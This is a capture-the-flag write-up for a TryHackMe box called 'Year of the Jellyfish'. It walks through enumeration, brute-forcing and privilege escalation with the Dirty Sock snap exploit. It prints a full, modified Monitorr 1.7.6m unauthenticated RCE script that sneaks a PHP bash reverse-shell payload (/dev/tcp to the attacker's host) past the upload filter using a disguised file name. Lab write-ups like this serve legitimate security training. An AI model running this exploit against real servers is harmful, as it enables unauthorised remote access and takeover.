Year of the Jellyfish

30/04/2021 | Difficulty: Hard

SYNOPSIS

Year of the Jellyfish is a hard box, based on the real-world challenge; giving a good practice for OSCP Preparation. Starting with Enumeration, helps us find subdomains, where using the Monitorr 1.7.6m RCE exploit leads us to foothold for the box, and ending with Privilege escalation using Dirty Sock version-2 exploit helps us to gain root access for the box. Also not forget to mention; this box is running on Public IP and also connected to Tryhackme Network.

ENUMERATION

Starting with Nmap: Scanning each port and then running another command to know more about services running on that particular ports.

nmap -p- -vv <MACHINE-IP>

Now after getting this output running the following command to know more about services running on all the above ports.

nmap -sC -sV -p 21,22,80,443,554,1723,8000,8096,22222 <MACHINE-IP>

The output is very long, Instead of pasting the screenshot, writing the key points:

FTP running on Port 21 but no enough information to get in.
SSH is running on two ports: 22 & 22222.
Webserver Running on 4 ports: 80, 443, 8000 & 8096.
Looking closer to port 443 output; Shows the following subdomains:
- monitorr.robyns-petshop.thm
- beta.robyns-petshop.thm
- dev.robyns-petshop.thm

Now after getting the whole overview of what's happening on the network let's go deeper and start enumerating the Webservers. Before that adding the IP with domains and the subdomains in /etc/hoststhis file. To know more about why to add all this check out this article.

Now starting with Root domain enumeration: robyns-petshop.thm; You'll notice that it asks to accept the self-signed certificate and after doing so you will see the below front page.

It has not anything special; started with ffuf using the following command for brute-forcing directories and got the following results:

ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u https://robyns-petshop.thm/FUZZ

Went through each and every one of them, found nothing special. Moving onto looking for what subdomains has to provide. The beta.robyns-petshop.thm & dev.robyns-petshop.thm had the same thing to show that the site is Under Construction.

The ID_HERE thing looked fishy so made a wordlist of numbers using Crunch with the following command to Bruteforce.

crunch 4 4 -t %%%% -o numb

This made a wordlist of numbers starting from: 0000-9999 . But again no luck with any information, Tried this on both subdomains - Dev & beta.

Also before moving to the last subdomain there was another service running on port 8096 of the root domain named Jellyfin as you can see in the below image. This had a login portal, so fired up Hydra and started Bruteforcing the Credentials but no luck with that too.

Now we are left with our last sub-domain: monitorr.robyns-petshop.thm and this was looking interesting as it was Open-Source [It had GitHub Repo], Version 1.7.6 was mentioned below down the page and had a Login portal too. For the login portal, username: admin was the default one, so again used Hydra to brute-force with admin username, but no luck.

Using Searchsploit to identify if there's any exploit available for this monitorr version, and got the following results:

INITIAL FOOTHOLD

Looking into the first exploit here Authorization Bypass, "allows creation of administrative accounts by abusing the installation URL". This Exploit basically makes a post request to this path: /assets/config/installation/_register.php?action=register to create a new user. And while adding this path to the monitorr domain it gives a 404 Not Found, Hence this exploit won't work!

Moving to the 2nd exploit Remote Code Execution (Unauthenticated), I directly tried the exploit and it gave me errors and errors the main thing it showed was that the Certification Verification Failed, so searched on the internet and got to know that adding this to the code verify=False will ignore the verification thing and would move on with the code.

Again tried with the exploit, it didn't worked. So if we see the code, that requests.post is sending post request to the server and in order to check the response, printed out the response.

print(requests.post(url, headers=headers, data=data, verify=False).text)

Now running the exploit again, getting the following error:

After a while, got to know there's a cookie in the browser found via developer tools: isHuman with value 1, after that added the cookie in the code and ran the script, same error again; maybe there might be filter for uploading the files. Then messed up with file names, used HackTricks Article and finally got the file upload bypass: shell.jpeg.Php

And here's how the code is looking after doing all the changes to the main exploit:

#!/usr/bin/python
# -*- coding: UTF-8 -*-

# Exploit Title: Monitorr 1.7.6m - Remote Code Execution (Unauthenticated)
# Date: September 12, 2020
# Exploit Author: Lyhin's Lab
# Detailed Bug Description: https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
# Software Link: https://github.com/Monitorr/Monitorr
# Version: 1.7.6m
# Tested on: Ubuntu 19

import requests
import os
import sys


if len (sys.argv) != 4:
    print ("specify params in format: python " + sys.argv[0] + " target_url lhost lport")
else:
    url = sys.argv[1] + "/assets/php/upload.php"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0","Accept": "text/plain, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------31046105003900160576454225745", "Origin": sys.argv[1], "Connection": "close", "Referer": sys.argv[1]}

    data = "-----------------------------31046105003900160576454225745\r\nContent-Disposition: form-data; name=\"fileToUpload\"; filename=\"shell.jpeg.Php\"\r\nContent-Type: image/gif\r\n\r\nGIF89a213213123<?php shell_exec(\"/bin/bash -c 'bash -i >& /dev/tcp/"+sys.argv[2] +"/" + sys.argv[3] + " 0>&1'\");\r\n\r\n-----------------------------31046105003900160576454225745--\r\n"

    print(requests.post(url, headers=headers, data=data,verify=False,cookies={"isHuman":"1"}).text)

    print ("A shell script should be uploaded. Now we try to execute it")
    url = sys.argv[1] + "/assets/data/usrimg/shell.jpeg.Php"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
    requests.get(url, headers=headers,verify=False,cookies={"isHuman":"1"})

Now before running the script, starting the nc listener at port 443 with sudo permissions. Why port 443? Because there might be firewall on other ports and I also tried with other ports it didn't worked. And ports below 1024 needs Sudo permissions.

First thing to do after getting reverse shell is to stabilize the shell. Using the following commands:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Note: Now do Ctrl+Z
stty raw -echo;fg

The First Flag: Is in the /var/www directory named as flag1.txt

PRIVILEGE ESCALATION

For Priv Esc, Started the Linpeas.sh but it really didn't showed any good results, then used Linux Exploit Suggester, and it showed the following results:

And now if we look at the snap version: it looks like it is vulnerable to Dirty Sock, let's download the zip to local machine and wget it to compromised machine!

Now it has 2 versions, tried the first one it gave error, and then tried the 2nd one and here's what I got: it created user dirty_sock which has root permissions! Then switched user to dirt_sock with the password:dirty_sock.

Then do sudo su; password as dirty_sock, hence root! <3